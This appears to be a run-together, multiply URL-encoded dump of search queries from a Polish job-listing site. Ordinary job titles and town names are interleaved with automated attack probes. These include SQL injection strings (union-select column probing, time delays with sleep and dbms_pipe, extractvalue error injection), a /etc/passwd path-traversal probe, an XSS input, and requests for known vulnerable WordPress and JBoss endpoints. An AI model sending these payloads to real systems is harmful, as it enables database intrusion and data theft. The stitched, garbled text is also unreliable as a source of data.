niemcykontrola+jako%25252525c5%252525259bcikierowca+kat.+bkierowca+(m/k)+(kat.+c+e,+hakowce) warszawaturystyka | hotelarstwomonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'administracja biurowa gdańskpraca%2bfizyczna germanywarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy%22 and %22x%22%3d%22xoperator sprzetu budowlanego katowice/pomoc%2bksi%c4%99gowaprodukcja dla niepełnosprawnych%' union all select null,null,null-- ejnaspecjalista d mazowieckiepracownik+obszaru+produkcji+%2528m/k%2529 podkarpackierencistki praca warszawaoperator w%252525252525c3%252525252525b3zk%252525252525c3%252525252525b3w wid%252525252525c5%25252525252monter konstrukcji/wp-login.php%252527a%25253d0/wp-content/plugins/revslider/temp/update_extractwarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy+and+1%25253d1praca%25252bbez%25252bznajomo%25252525252525252525c5%252525252525252525259bci%25252bj%25252525252525252525c4%2525252525252525252nauczyciel angielskiego poznańasystent klienta%25252c konsultantkrawcowamonter+konstrukcji/wp-login.php<inputtype="image"src="javascript:alert('mysqlerror');">+and+1>1warehouse/wp-login.php'a=0'a=0'a=0 tychypomocnik kierowcy katowicepraca%252bw%252bniemczechpracown+ik+gospodarczy-kierowcaksięgowość+|+audyt+|+podatkioperator%25252bprocesu%25252bwtryskupiechowicekierowca++kat+c+union+all+select+null,concat(concat('qqzpq','dhqtsdtnpm'),'qbbvq'),null,null,null,null,null--+kejsprzemys%2525c5%252582+%25257c+produkcja lublinpakowacz bez j%c4%99zykaoperator maszyn budowlanych%d0%9b%d0%be%d0%b3%d0%b8%d1%81%d1%82%d0%b8%d0%ba%d0%b0 %7c %d1%80%d0%b0%d1%81%d0%bf%d1%80%d0%b5%d0%b4%d0%b5%d0%bb%d0%b5%d0%bd%d0 warszawamechanik monter francjalektor angielskiegodyrektor małopolskiein%252525c5%252525bcynieria%25252b%2525257c%25252bprojektowaniekontroler jako%c5%9bci %28m/k%29kierowca++kat+c+union+all+select+null%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull--+lhxiinternet+|+e-commerce'a=0magazyn - praca od zaraz%2c 17%2c50 z%c5%82/godzin%c4%99 %2b premie i inne korzy%c5%9bci%21rolnictwo+|+ochrona+środowiska warszawakontrola%2bjako%25252525c5%252525259bcikasjer%';select dbms_pipe.receive_message(chr(103)||chr(72)||chr(97)||chr(72),5) from dual--m%25c5%2582odszy+konsultant+ds.+rekrutacji+%2528m/k%2529lektor j. niemieckiegokierowca kat c union all select null%252cnull%252cnull%252cnull-- hqnoasystent/ka%20ds.%20ksi%252525c4%25252599gowoscikierowca kat c union all select null%2cconcat%28concat%28%27qqzpq%27%2c%27fozgdoitzosfomiygouwpolfoaofitpvxcgizprbez%2bznajomo%25c5%259bci%2bj%25c4%2599zyka niemcyspecjalista d/s importu -eksportu %2525252525252c obs%252525252525c5%25252525252582uga klienta %2525252525252c ar %2525252525252praca%2bsezonowapraca%2bbiuraluglass - realizacja piotr kalbarczyk' order by 1-- bikgdoradca+handlowy warszawaprzemys%2525c5%252582 %25257c produkcja krojczy pomorskiewarehouse/wp-login.php'a=0'a=0location=tychy99999" union select unhex(hex(version())) -- "x"="x"and"m"="ifinanse+|+bankowośćpomocnik %c5%9bmieciarzanauczyciel j%c4%99zyk niemiecki/login.actionin%2525c5%2525bcynier+sanitarnychpraca+chałupniczaspecjalista ds ubezpieczeńfizyczna,kierowca,operator, roznapobiedziskatechnik%2belektryk%2b%252528m/k%252529budownictwo%25252525252b%25252525252525257c%25252525252bgeodezjapraca++fizyczna+bez+j%25252525c4%2525252599zyka niemcyślusarz+bez+jezyka niemcybadania i rozw%252525c3%252525b3jaaaaaaaapielĘgniarkipraca fizyczna bez j%252525252525c4%25252525252599zykafinanse %2525257c bankowo%252525c5%2525259b%252525c4%25252587praca zdalna śląskiemonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.php%253faction%253drevslider_show_image%2527a%253d0%2527%27a%3d0pracownik+ksi%25c4%2599gowo%25c5%259bcikontrola+jako%2525c5%25259bcioperator cnc lubańmagazynier%2cprodukcja%2ckierowca kat.b'a=0pracownik%2bprodukcji%2b-%2bpraca%2bw%2bgodz.%2b7-15specjalsita ds. zakup%c3%b3wpraca dla analityka hta %2528krak%25c3%25b3w%2529biuro podróżyze%2b%c5%9brednim%2bwykszta%c5%82ceniemmonter konstrukcji/wp-login.php%27a%3d0/wp-admin/wp-admin/admin-ajax.php?action=revslider_show_imagemagazynier - nie wymagamy do%c5%9bwiadczeniasprzataczka w szkole2121121121212.1kontrola%252bjako%2525c5%25259bci mazowieckiein%252525c5%252525bcynier jako%252525c5%2525259bcipraca+bez+znajomo%c5%9bci+j%c4%99zykapracownik produkcyjny %28m/k%29praca%2bbez%2bznajomo%2525252525c5%2produkcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null,null--+eoripraca bez znajomośckudowam%25c5%2582odszy analityk warszawakierowca kat b c1111111111111%27 union select char%2845%2c120%2c49%2c45%2c81%2c45%29--logistics%252bmanageroperator w%2525c3%2525b3zka wid%2525c5%252582owego niemcypracownik sklepu odzieżowego (m/k)jako%c5%9b%c4%87operator%2bw%25c3%25b3zka%2bwid%25c5%2582owego%2b%2528m/k%2529software+pro+%c5%99%c3%adzen%c3%ad+firmy+%7c+slu%c5%beby+google+pro+firmy+%e2%80%93+google%27a%3d0pracownik powierzchni sprzeda%2525c5%2525bc%2525c4%252585mechanik%2c+operator+maszynbudownictwo+%7c+geodezja pomorskieprzemysł | produkcja szczecinpraca popo%c5%82udniami-1260 union all select 14,14,14,14,14,concat(concat('qqzpq','gacbylpufr'),'qbbvq'),14-- kpixmonter+konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0"+and+"x"="y"+and+"x"="ypraca++fizyczna+bez+j%252525c4%25252599zyka niemcyprodukcja+lek%25252525c3%25252525b3wmonter konstrukcji/wp-login.php%25252527a%2525253d0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php%252kierowca+w+wypo%252525c5%252525bcyczalni+samochodowej+%25252528m%252fk%25252529 niemcyz+orzezceniem katowiceprotetyk s%c5%82uchut%25c5%2582umacz+angielskiego warszawawarehouse/wp-login.php%2525252527a%252525253d0%2525252527a%252525253d0location%252525253dtychy and 1%252525253d1%2525252527a%252physical+workj%252525c4%25252599zyk w%252525c5%25252582oski warszawapraca+w+niemczechczerwionka-leszczynypraca+w+magazynie+niemcy+bez+znajomo%c5%9bci+j%c4%99zykaspecjalista%2bds.%2bplanowania%2bjako%c5%9bci%2b%28m/k%29pracownik produkcji p%252525252525c5%25252525252582o%252525252525c5%25252525252584skpraca++fizyczna+bez+j%2525252525252525c4%252525252525252599zyka niemcypracownik%2bdo%2bsortowania%2bowoc%252525c3%252525b3wkierowca kat b c warszawapraca pomoc ksi%252525c4%25252599gowespecjalista ds. sprzedanauczyciel+język+niemieckipraca%c2%a0zdalna%c2%a0z%c2%a0domukierowca w%25c3%25b3zka wid%25c5%2582owegomonter+konstrukcji/wp-admin/admin-ajax.php%3faction%3drevslider_show_imagewarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy%22+and+%22x%22%3d%22xco2 laser opratorfrenchjako%2525252525c5%25252525259b%2525252525c4%252525252587pracownik+monta%2525c5%2525bcu+%252528m/k%2525296operator wózka widłowego'języka+hiszpańskiego warszawakierowca+c%2be+lub+c1ślusarz bez jezyka niemcyhuman+resources+%25257c+kadry warszawasulechówmonta%25c5%25bc+instalacji+elektrycznych pomorskieturystyka warszawamonter%25252525255c%2bpakowaczj%2525c4%252599zyk+w%2525c5%252582oski warszawasamodzielna+ksi%c4%99gowakierowca vipasystent/ka+ds.+ksi%25c4%2599gowosci warszawaprzemys%252525c5%25252582 %2525257c produkcja pomorskiespecjalista ds kadr i p%25252525c5%2525252582ac podkarpackiepomoc%2bw%2bt%252525c5%25252582umaczeniachin%2525c5%2525bcynier%2bbudowy/wp-login.php%22%2band%2b%22x%22%3d%22x'and(select'1'from/**/cast(md5(1182120483)as/**/int))>'0pracownik+monitoringu+-+obiekt+handlowy+-+gliwice gliwicespecjalista+dskoordynator+projektukierowca kat c union all select null%252cnull%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527gqxldvjcba%2527%2529%252c%2527aluglass+-+realizacja+piotr+kalbarczyk;select+sleep(32)#praca%2525252bbez%2525252bznajomo%2525252525252525c5%25252525252525259bci%2525252bj%2525252525252525c4%25252525252 niemcyprodukcja%2bdla%2b%2bniepe%c5%82nosprawnych%2b1/2%2betatuspecjalista d/s importu -eksportu %2525252c obs%252525c5%25252582uga klienta %2525252c ar %2525252c konsultant z j%252525c4%2525asystent warszawapraca+fizyczna+dorywcza warszawabiuro+administracja+ksi%25c4%2599gowo%25c5%259b%25c4%2587+j%25c4%2599zykichełm+Śląskitesterjęzyk+włoskipracownik%2bporz%25c4%2585dkowy%2b%2528m/k%2529kontroler jakościz Łódźadministracja%2bpa%252525c5%25252584stwowt%2525c5%252582umacz angielskiegorawiczaterimakierowca %252528m%252fk%252529 %252528kat. c%25252be%25252c hakowce%252529 niemcynauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam%';select count(*) from all_users t1,all_users rekrutacja pracownik%252525c3%252525b3wpracownik produkcyjny wielkopolskasprzedaż | obsługa klienta lublinw%c3%b3zki wid%c5%82owetransport+morskiwarehouse/wp-login.php%252525252527a%25252525253d0%252525252527a%25252525253d0location%25252525253dtychy and 1%25252525253d1kierowca++kat+c%27%3bselect+dbms_pipe.receive_message%28chr%28103%29%7c%7cchr%2880%29%7c%7cchr%2890%29%7c%7cchr%2876%29%2c5%29+fkierowca kat c union all select 14%2c14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27xoirqgorcl%27%29%2c%27qbbvq%27%29%2c14%2c14%2technik+elektryk/wp-login.php%252527a%25253d0praca+fizyczna ożarów+mazowieckikonsultant+j%252525c4%25252599zyk+angielskifinanse%252b%25257c%252bbankowo%2525c5%25259b%2525c4%252587przemys%25252525c5%2525252582+%252525257c+produkcjainowłódznauczyciel j%25c4%2599zyk niemiecki/login.actionwarehouse/wp-login.php%27a%3d0%27a%3d0'+and+'x'='xpraca+biurowa wrocławsortowacz odpadów komunalnychasystenttransport | spedycja" and "x"="xkierownik bРабота+с+персоналом+|+Кадры bielany+wrocławskiein%252525c5%252525bcynier elektryknauczyciel+j%c4%99zyk+niemiecki mazowieckieca%25252525c5%2525252582a+polskaoperator+ładowarkitransport+%257c+spedycja%2522+and+%2522x%2522%253d%2522y%2527a%253d0office assistant polandb małopolskiesprz%25c4%2585taczka w szkolemontażgastronomia-pomoc+kuchenna krakówtechnik konsultantpraca sezonowapraca bez znajomo%2525c5%25259bci j%2525c4%252599zyk niemcyparacownik myjnielektryk z dsbbudownictwo %252525257c geodezja pomocnikmonter konstrukcji/wp-login.php%2527a%253d0/894613256498.phpoperator+rotofleksu warszawaprsca fizyczna niemcymerkury market tarnówpracownik+produkcji płońskspecjalista bhp warszawaemerytka+szczecin+pomorzanymonter+konstrukcji/wp.../wp-admin/admin-ajax.php%253faction%253drevslider_show_image%d0%b2%d0%be%d0%b4%d0%b8%d1%82%d0%b5%d0%bb%d1%8c%20%d0%ba%d0%b0%d1%82%d0%b5%d0%b3%d0%be%d1%80%d0%b8%d0%b8%20bin%c5%bcynier warszawapraca+gastronomia wrocławkierowca++kat+c+union+all+select+null,null--+tbxekierowca++kat+c+union+all+select+null,null,null--+zdsqsprzedaż+|+obsługa+klienta szczecinpracownik%2bksi%c4%99garnibudownictwo %7c geodezja pomorskiemonter+konstrukcji/wp-login.php%252527a%25253d0/uploadify/uploadify.php%25253ffolder%25253dmonter konstrukcji/wp-admin/admin-ajax.php?action=revolution-slider_show_image'a=0'a=0pracownik+monta%c5%bcu+%28m/k%29kierownik śląskieoperator%2bprasy%2bkrawedziowejaluglass - realizacja piotr kalbarczyk") and (select (case when (4765=9678) then null else cast((chr(65)||chr(102)||chr(109)||chtłumacz+rosyjskiego warszawatechnolog %c5%bcywnosci mazowieckiemonter+kuchni niemcypracownik ochrony zabrzeautomatykprzemys%25c5%2582 %257c produkcja pomorskiepraca%2525252b%2525252bfizyczna%2525252bbez%2525252bj%2525252525c4%252525252599zyka niemcytransport+%7c+spedycja mazowieckieoperator+w%25c3%25b3zka warszawawarehouse/wp-login.php%252525252527a%25252525253d0%252525252527a%25252525253d0location%25252525253dtychy%252525252527 and %25252kadr+i+płac warszawasprzedaż+|+obsługa+klienta siedlcemechanik wielka brytaniaoperator%2bw%25252525252525c3%25252525252525b3zk%25252525252525c3%25252525252525b3w%2bwid%25252525252525c5%2525252525252582owych polskanauczyciel j%c4%99zyk niemiecki/login.action/web-console/admin-console/login.seamtechnik elektryk %252525252528m/k%252525252529monter+konstrukcji/wp-login.php%2527a%253d0/wp-adminpomoc kuchenna szczecinpraca fizyczna Łódźkonsultant j%25c4%2599zyk angielskiinformatyka administracja śląskieprodukcja%252bdla%252b%252bniepe%252525c5%25252582nosprawnych%252b1/2%252betatutechnik+elektryk+(m/k) szczecinmonter konstrukcji/wp.../wp-admin/admin-ajax.php%3faction%3drevolution-slider_show_imagemonter%2bkonstrukcji/wp-login.php%3cinputtype%3d%22image%22src%3d%22javascript%3aalert%28%27mysqlerror%27%29%3b%22%3eoperator+w%25252525c3%25252525b3zka+wid%25252525c5%2525252582owego holandiamonter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0+and+1%3d1%22%3ehksi%c4%99gowo%c5%9b%c4%87+%7c+audyt+%7c+podatki warszawapracownik budowlanki gorzów wielkopolskipakowanie%2b%c5%bcywno%c5%9bciprzemysł+|+produkcja holandia/etc/passwd%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- ywif1/2%2520emerytpracownik produkcji spo%2525c5%2525bcywczej %252528m/k%252529pracownik+obszaru+produkcji+(m/k) czechowice-dziedzicepraca+fizyczna+sprz%c4%85taczka szczecintransport %257c spedycja%22 and %22x%22%3d%22xpracownik do sortowania owocówprodukcja dla niepełnosprawnych%' union all select null,null#kierowca w wypo%25c5%25bcyczalni samochodowej %28m/k%29 katowicepraktyki+%257c+sta%25c5%25bcmistrz zmiany, poznańkierowca kat c union all select null%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27gqxldvjcba%27%29%2c%27qbbvq%27%29%2cnull%2cnulspecjalista%2bds.%2brekrutacjiwarehouse warszawapraca%2bfizycznakucharzdiagnosta samochodowydoradca ds nieruchomo%252525c5%2525259bcihydraulik/monter%252binstalacji francjaelektryk mistrzmonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php?action=revslider_show_imagepraca+zdalna polskaprzemysł | produkcja grójecmonter%252bkonstrukcji%252fwp-login.php%2527a%253d0%252f07545460.php%252band%252b1%253d1%2527a%253d0tłumacz angielskiego, ukrainskiego, rosyjskiego warszawanauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam order by 1#produkcja+dla++niepełnosprawnych'+union+all+select+null,null,null#Łęcznaoperator koparki%2c brukarz%2c pomocnik budowlanymonter+konstrukcji/wp-login.php%2527a%253d0/07545460.php+and+1%253d1j%2525c4%252599zyka%2bhiszpa%2525c5%252584skiegoinformatyka+programowanie+helpdeskpracownik+dzia%2525c5%252582u+obs%2525c5%252582ugi+klienta warszawajęzyk francuski warszawaprzedstawiciel handlowy pomorskiepraca+ca%c5%82y+etatnauczyciel język niemiecki/login.action/invoker/jmxinvokerservletin%25c5%25bcynier+serwisu mazowieckiesprzeda%c5%bc %7c obs%c5%82uga klienta koszalinrudateresintransport%2b%257c%2bspedycja2121121121212.1siechnicetechnik+elektryk+%25252528m/k%25252529francuski warszawaneklaprodukcja dla niepełnosprawnych' union all select 13,13,concat(0x7170627871,0x65686e4f4476744f5976,0x717a786a71)#technik%2belektryk%2b%252528m/k%252529 pomorskiekierowca++kat+c+union+all+select+14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527guotrpdkjnquteorboujxqudymlmzftutpbsxqau%pracownik%2bporz%2525252525c4%252525252585dkowybackground removal jobs warszawaadministracja pa%c5%84stwowa warszawaprodukcja%2bindesit%2b-%2bbezp%c5%82atny%2btransport-%2batrakcyjne%2bpremiepraca bez znajomo%25252525c5%252525259bci j%25252525c4%252525259nauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam;select count(*) from all_users t1,all_users t2nauczyciel j%2525c4%252599zyka niemieckiegomonter%2bkonstrukcji/wp-login.php%27a%3d0/07545460.php%27%2band%2b%27x%27%3d%27xpracownik%252bprodukcji%252b%252525252528m/k%252525252529praca biurowa z obs%2525c5%252582ug%2525c4%252585 klienta warszawatechnolo konstrukcji/enterso.info/wp-login.php%252527kurs na w%2525c3%2525b3zek wid%2525c5%252582owymagazynowy+%2528m/k%2529 lublinpracownik+monta%25c5%25bcupraca pomoc ksi%c4%99gowej wielkopolskieprodukcja dla niepełnosprawnych union all select null,null,null,null,null,null,null,null,null-- jhghin%25c5%25bcynier budowy/wp-login.php and 1=1'and'l'='bturekprzemys%2525c5%252582+%25257c+produkcja sosnowiecin%252525c5%252525bcynier+budowy/wp-login.phppolanica-zdrójprzemys%252525c5%25252582 %2525257c produkcja wielkopolskiein%c5%bcynier+serwisusekretarka medyczna krakówgrodzisk+mazowieckiПортугалияpracownik betoniarz warszawasap%2babap%2bmmkierowca transport mleka wielkopolskiekierowca%20w%20wypo%c5%bcyczalni%20samochodowej%20(m/k)praca z orzeczeniem o niepełnosprawności kierowca kat.b kielcespecjalista+ds+kadr+i+płac poznańasystent+klienta,+konsultantkierowca%2bkat%2bbpraca+dla+studenta lublinmonter%2bkonstrukcji/wp-login.php%27a%3d0/07545460.php%27%2band%2b%27x%27%3d%27ytechnik konsultant %25252525252528m/k%25252525252529koordynator+transportuspawacz lubuskiewarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy+and+1%253d1%2527a%253d0boguszów- gorcepracownik biurowyaaaaaaaaj%2525c4%252599zyk%2bfrancuskiod%25252bzarazoperator koparki nowy sączbez%252bznajomo%252525c5%2525259bci%252bj%252525c4%25252599zykapracownik produkcji nowy tomyślspecjalista%2bds%2bkar%2bi%2bp%c5%82ac%27a%3d0%27a%3d0оператор+конвейерной+линии+пищевой++продукцииtransport%20%25257c%20spedycja%2527a%253d0kierowca kat c+e warszawapracownik+biunauczyciel+1-3inżynier budowy/wp-login.php''/**/and/**/dbms_pipe.receive_message('w',0)='wpracownik+porz%25c4%2585dkowy+%2528m/k%2529przemysł+|+produkcja belgiapraca biur warszawapraca+fizyczna sochaczewprodukcja dla niepełnosprawnych union all select null,null,null,null,null,null,null-- eoriprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,null,null,null,null,null,null--+naozpracownik administracyjny warszawapraca++fizyczna+bez+j%252525252525c4%25252525252599zyka niemcypakowanie %c5%bcywno%c5%9bcipracownik ochrony fizycznej - obiekt handlowyz%2borzezceniem katowice/etc/passwd+union+all+select+null,null,null,null,null,null,null,null--+ibizdoradca ds. kredyt%2525c3%2525b3wwulkanizatorzdalna polskaoperator+w%2525c3%2525b3zka+wid%2525c5%252582owego brzegmonter konstrukcji/wp-login.php'a=0/uploadify/uploadify.php?folder=/praca+w+piekarni pomorskiepracownik+magazynowykadrowaspecjalista+ds.+administracji+%252525252528m/k%252525252529spawacz zbrojeńmonter%2fka+element%2525c3%2525b3w+do+siedze%2525c5%252584+samochodowychmłodszy konsultant sprzedaży m/k ząbkowicealuglass+-+realizacja+piotr+kalbarczyk"+rlike+sleep(32)+and+"epcu"="epcuruben+bauspecjalista+d/s+płatnika warszawasortowanie warzyw holandiajęzyk rosyjskispedytor+międzynarodowyspecjalista ds kadr i p%2525252525c5%252525252582acpraca+z+orzeczeniem warszawajarosławpraca+biurowa+z+obs%2525c5%252582ug%2525c4%252585+klientain%25252525c5%25252525bcynieria %252525257c projektowanie podkarpackiepracownik do sortowania owocówkierowca piłakoordynator+łańcucha+dostawinżynier budowypraca+fizyczna pruszkówdzierżoniówtransport+%25257c+spedycja%2527a%253d0produkcja%2bdla%2b%2bniepe%25252525c5%2525252582nosprawnych%2b1/2%2betatudeszcznoaluglass - realizacja piotr kalbarczyk") and extractvalue(8473,concat(0x5c,0x716a786271,(select (elt(8473=8473,1))),0x716b717171pracownik+produkcji+%25252528m/k%25252529 niemcyprace%2bfizycznetransport %2525257c spedycja and 1%2525253e1specjalista+ds.+p%c5%82ac+i+kadr mazowieckiebackgrounf+removal+jobsin%25c5%25bcynier budownictwamonter+konstrukcji/wp-login.php'a=0/894613256498.phpsortowanie Łódźinżynier+produkcji łódzkietechnik+weterynariioperator%252bw%25c3%25b3zka%252bwid%25c5%2582owegodziale zakup%c3%b3winternet %2525257c e-commercepraca+dla+ukraińcówprzemysł | produkcja krakówsprzeda%25c5%25bc+%257c+obs%25c5%2582uga+klienta szczecinpracownik+produkcji częstochowalogistyka %25257c dystrybucjap%252525c5%25252582atnos cipraca%2bfizyczna podkarpackiespecjalista wrocławРабота с персоналом | Кадры bielany wrocławskiepraca%252bfizyczna%252bsprz%2525c4%252585taczka szczecinspecjalista%2bds%2bkadr%2bi%2bp%25252525c5%2525252582acsekretarka+ze+znajomo%2525c5%25259bci%2525c4%252585+j.+niemieckiego warszawaasystent/ka ds. administracji i obs%25c5%2582ugi klienta ze znajomo%25c5%259bci%25c4%2585 j%25c4%2599zyka ruskiego gdyniaoperator+w%252525c3%252525b3zka+wid%252525c5%25252582owego katowicein%25c5%25bcynieria %257c projektowaniekierowca %2528m%252fk%2529 %2528kat. c e%252c hakowce%2529 niemcypracownik ochrony fizycznej z kwalifikacj%c4%85 mazowieckiekierowca w wypo%252525c5%252525bcyczalni samochodowej %25252528m%2525252fk%25252529asystent/ka+ds.+administracji+i+obsługi+klientamonter%2525252fka element%25252525c3%25252525b3w do siedze%25252525c5%2525252584 samochodowych niemcyspecjalista+ds+rozlicze%25252525c5%2525252584hr%25252c kadry mazowieckiepracownik produkcji %25252528m/k%2525252pracownik dzia%2525252525c5%252525252582u w%2525252525c4%252525252599dlinykierowca++kat+c+union+all+select+null,null,null,concat(concat('qqzpq','cxqxjonpiiefyyvyknzvyixrpiwoxyxdxxqwajcd'),'qbbvq'),null,dzia%252525c5%25252582+obs%252525c5%25252582ugi+klientaspcjalista+ds+inwentaryzacji katowice%d1%81%d1%82%d0%be%d0%bb%d1%8f%d1%80praca w domumonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0''a=0in%2525c5%2525bcynier serwisu warszawakierowca c+e poznańpracownik%2bdzia%25c5%2582u%2bobs%25c5%2582ugi%2bklientapraca+z+orzeczeniem+o+niepełnosprawności kielcekierowca w wypo%2525252525c5%2525252525bcyczalni samochodowej %252525252528m%252525252fk%252525252529in%252525252525c5%252525252525bcynieria+%2525252525257c+projektowaniebudownictwo%2b%2525257c%2bgeodezja francjapracownik dzia%2525252525c5%252525252582u w%2525252525c4%252525252599dliny/serysprzedawca w sklepie medycznymsztumkurs+na+wózki+widłowedyrektor+finansowy śląskiemonter/ka elementów do siedzeń saminformatyka programowanie katowicepracownik%2bmagazynu%2bbez%2bdo%c5%9bwiadczeniadobczycechorzówkierowca+śmieciarki niemcysprzedaż | obsługa klientakierowca+w+wypo%c5%bcyczalni+samochodowej+%28m%2fk%29produkcja+dla++niepełnosprawnych'+union+all+select+null,null,concat(0x7170627871,0x7147744e465853694a78,0x717a786a71)technik%2belektryk%2b%252528m/k%252529 kujawsko-pomorskiemalarz%2bbudowlanyprodukcja dla niepełnosprawnych union all select null,null,null,null,null,null,concat(0x7170627871,0x46684d63644b556d7659,0x717customer+service+specialist+with+turkish warszawakierowca kat c union all select null%25252cnull%25252cconcat%252528concat%252528%252527qqzpq%252527%25252c%252527umgimyqgojfmntkierowca b mazowieckiepraca%2bpomoc%2bksi%252525252525c4%25252525252599gowejpraca+pomoc+księgowejnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam") and 1575=(select count(*) from sysusers as spracownik ochrony katowicekierowca kat c union all select null%252cnull-- tbxecoordinatorksięgowość warszawaniemcykierowca+c%252525252be niemcykierowca kurierkonstruktor odziezy Łódźpracownik+działu+hroperator+w%252525c3%252525b3zk%252525c3%252525b3w+wid%252525c5%25252582owych polskapracownik produkcji %25252528m%252fk%25252529pracownik magazynu od zarazpracownik%2bprodukcji-bez-jezyka-niemieckiegoserwis | technika | montaż poznańtransport+%2525257c+spedycjaaaaaaaaaasystent/ka%2bds.%2badministracji%2bi%2bobs%c5%82ugi%2bklientaangielski+hiszpański warszawakierowca kat c union all select null%25252cnull%25252cnull%25252cnull-- wkbnin%c5%bcynier budowy pomorskiein%c5%bcynier budowy/wp-login.php" and "x"="x'and(select*from(select sleep(2))a/**/union/**/select 1)='j%c4%99zyk%2bw%c5%82oskiwarszawa*doradca zawodowy dolnośląskiekontrola+jakości sochaczewmonter konstrukcji/wp-login.php%2527a%253d0/07545460.php%2527 and %2527x%2527%253d%2527ypraca bez znajomo%c5%9bci j%c4%9 niemcypraca fizyczna świdnicamonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0 and 1%3d1%3cinpudoradca+do+spraw+odszkodowańpracownik gospodarczy złota rączka łódzkiespecjalista%2bds.%2bjako%2525252525c5%25252525259bcikierownik wrocławasystent%20ds.%20kadr%20i%20p%c5%82acpraca+bez+znajomo%25252525c5%252525259bci+j%25252525c4%252specjalista%2bds%2bubezpiecze%2525252525c5%252525252584market warszawapraca%25252525252bzakwterowaniemspecjalista+ds+controllingu krakównauczyciel+j%25c4%2599zyk+niemiecki/login.action/web-console/web-console/invokerbudownictwo+%252525257c+geodezja francjaicelandjunior front-end%252527 warszawapraca%25252b%25252bfizyczna%25252bbez%25252bj%252525c4%25252599zykamarketing | reklama | praaaaaaaakierowca kat c%25%27 union all select null-- lmxvkierowca w%25252525c3%25252525b3zka wid%25252525c5%2525252582owego%27a%3d0pracownik biurowy z językiem francuskim - praca zdalnaprzemys%c5%82 %7c produkcja szczecinpracownik+obszaru+produkcji+%252528m/k%252529magazynier %28m/k%29 opolepracownik szklarni z r%2525c3%2525b3%2525c5%2525bcami holandiapracownik+zielenispecjalista+ds.+wdrożeńoperator%2bwsparcia%2bprodukcjipracownik%252bmagazynowy niemcypomocnik+%c5%9bmieciarza-3921' union all select 13,concat(0x7170627871,0x456b774a426c4e7a534d434a4c71634671524364715571694d4f5663636350697a544867494d596mechanik+samochodów+ciężarowychtransport%2b%7c%2bspedycjaaaaaaaaapracownik%2bszklarni%2bz%2br%25252525c3%25252525b3%25252525c5%25252525bcamidekpol s.a.z+orzezceniem szczecinpraca+zdalna warszawaasystent ds.administracyjnychkonsultant+ślubnypomoc%2bksi%252525c4%25252599gowaspecjalista z jniemieckim poznańpół etatu warszawainformation technology warszawatechnolog produkcji aluminiumksięgowa mazowieckieoperator+wózka+widłowego warszawabudownictwo+%257c+geodezja pomorskiemagazynnauczyciel+j%c4%99zyk+niemiecki/login.actionspecjalista+ds.+kadr+i+rekrutacji+%252525252528m/k%252525252529excel krakówoławanauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam';select count(*) from all_users t1,all_users tmanager+łańcucha+dostawochrona emeryt warszawalogistyka %257c dystrybucja niemcydla%252buczniaaluglass - realizacja piotr kalbarczyk") procedure analyse(extractvalue(2938,concat(0x5c,0x716a786271,(select (case when (2938=2aluglass - realizacja piotr kalbarczyk" and 9800 in (select (char(113)+char(106)+char(120)+char(98)+char(113)+(select (case whenbiuro administracja ksi%2525252525c4%252525252599gowo%2525252525c5%25252525259b%2525252525c4%252525252587 j%2525252525c4%2525252in%2525c5%2525bcynier%2bbudowy/wp-login.php%22%2band%2b%22x%22%3d%22x"and/**/extractvalue(1,concat(char(126),md5(1124727603)))anbudownictwo %2525257c geodezjapraca+dla+analityka+hta+%252528krak%2525c3%2525b3w%252529pracownik ochrony sochaczewkontrola%252525252bjako%25252525252525c5%252525252525259bci polskamonta%252525c5%252525bc instalacji elektrycznychruby+on+railsdobrońpracownik%2bna%2bfarmie%2bmlecznej niemcyobs%2525c5%252582uga+klienta warszawaprzemys%c5%82 %7c produkcja niemcyspecjalista ds turystykikierowca+b+bes+znajosci+jenzykakontrola%25252bjako%2525c5%25259bci polskapracownik+fizyczny wałbrzychdoradca+techniczny warszawapomocnik%2b%c5%9bmieciarza polskaasystent+biurowysta%25252525c5%25252525bc+hr/etc/passwd'+union+all+select+null,null--+eewykierowca+w+wypo%252525252525c5%252525252525bcyczalni+samochodowej+%25252525252528m%25252fk%25252525252529 niemcyhr%252c+kadryrecepcjonista/ka warszawagłówna księgowa śląskiehotels+hiszpańskiegotransport+%25257c+spedycja%2527+and+%2527x%2527%253d%2527xprodukcja+indesitspecjalista+ds.+jakościwarehouse/wp-login.php%27a%3d0%27a%3d0'drug-resistance testing | laboratory testing | adult and adolescent arv | aidsinfopraca%2525252bzakwaterowaniempracownik+administracyjna poznańtechnik elektryk (m/k) śląskiepomoc+domowa warszawamonter+szaf+sterowniczych+(m/k)brygadzistaopiekunka do os%c3%b3b starszych w niemczech bez j%c4%99zyka niemcyjezyk francuski polskaobs%c5%82uga biurowazakrzewomonter konstrukcji/wp-login.php'a=0'a=0kierowca %252528m%252fk%252529 %252528kat. c e%25252c hakowce%252529 niemcykonsultant ds. obs%25252525c5%2525252582ugi klientakierowca kat 